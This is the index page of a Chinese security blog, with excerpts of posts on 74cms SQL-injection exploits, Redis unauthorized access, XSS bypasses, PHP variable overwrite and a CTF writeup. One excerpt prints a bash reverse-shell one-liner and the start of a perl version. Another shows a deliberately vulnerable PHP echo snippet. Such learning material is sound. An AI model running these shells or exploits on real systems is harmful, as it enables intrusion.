p0's blog | 破 关注网络安全
74cms人才系统注入+编写exp-2
发表于: | 分类: Python,代码审计 | 评论:0 | 阅读: 1033
0x00 前言 这是第五届山东省信息安全技能大赛的一个靶机环境,比赛的环境估计给改代码了,降低了难度,自己当时用sqlmap直接跑出来了,但实际环境是跑不出来的,过滤了注释符和其他一些语句,需要结合cms进行构造。 参考漏洞:wooyun-2015-137002 ...

阅读全文>>

74cms人才系统注入+编写exp
发表于: | 分类: Python,代码审计 | 评论:0 | 阅读: 885
0x00前言 才开始学代码审计,找一些前人的漏洞分析下 参考文章:wooyun-2014-060905 原文只指出了出现漏洞的地方,没给出利用方法,拿来分析,并给出exp 0x01代码分析 根据原文给出的代吗,找到include/fun_personal.php ...

阅读全文>>

redis未授权访问漏洞利用总结
发表于: | 分类: Web渗透 | 评论:0 | 阅读: 1478
0x01 redis介绍 Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。从2010年3月15日起,Redis的开发工作由VMware主持。从2013年5月开始,Redis的...

阅读全文>>

反弹shell的几种姿势
发表于: | 分类: Web渗透 | 评论:0 | 阅读: 876
bash版本: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 注意某些linux不支持 perl版本: perl -e 'use Socket;$i="10.0.0.1";$p=12...

阅读全文>>

XSS绕过分析
发表于: | 分类: Web渗透 | 评论:0 | 阅读: 713
0x00 前言 本文介绍简单xss利用及其绕过,几个案例,都是比较简单的,绕过方法分享给大家 0x01 分析 1、无安全方面的限制,直接使用 关键代码: <?php @$id = $_GET['id']; echo $id; payload: <sc...

阅读全文>>

Celery+Redis简单实现分布式爬虫
发表于: | 分类: Python | 评论:0 | 阅读: 1050
Celery官方手册:http://docs.jinkan.org/docs/celery/ 本文不再讲解Celery+Redis分布式环境搭建,具体参考官方手册 第一个程序: tasks.py: from celery import Celery app = ...

阅读全文>>

南京邮电大学网络攻防平台web writeup
发表于: | 分类: CTF | 评论:0 | 阅读: 1446
平台地址:http://ctf.nuptsast.com/ 签到题: 查看源代码的flag:nctf{flag_admiaanaaaaaaaaaaa} 签到2: post提交 input标签限制了最大长度10,口令长度为11 姿势: md5 collision...

阅读全文>>

PHP变量覆盖漏洞总结
发表于: | 分类: Web渗透 | 评论:0 | 阅读: 811
一、全局变量覆盖 当register_global=ON时,变量来源可能是各个不同的地方,比如页面的表单,Cookie等。 <?php echo "Register_globals: ".(int)ini_get("regi...

阅读全文>>

TOP